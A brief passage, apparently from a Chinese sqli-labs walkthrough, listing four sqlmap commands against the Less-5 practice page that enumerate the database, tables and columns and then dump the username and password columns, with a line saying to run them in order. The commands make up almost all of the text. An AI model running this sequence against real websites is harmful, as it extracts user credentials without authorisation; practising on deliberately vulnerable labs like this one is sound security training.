D:\sqlmap>python sqlmap.py -u "http://sqli-labs:8989/Less-5/?id=1" --current-db
D:\sqlmap>python sqlmap.py -u "http://sqli-labs:8989/Less-5/?id=1" -D security --tables
D:\sqlmap>python sqlmap.py -u "http://sqli-labs:8989/Less-5/?id=1" -D security -T users --columns
D:\sqlmap>python sqlmap.py -u "http://sqli-labs:8989/Less-5/?id=1" -D security -T users -C password,username --dump
按顺序输入以上命令即可,分别对应爆数据库名,爆表名,爆列名,爆数据。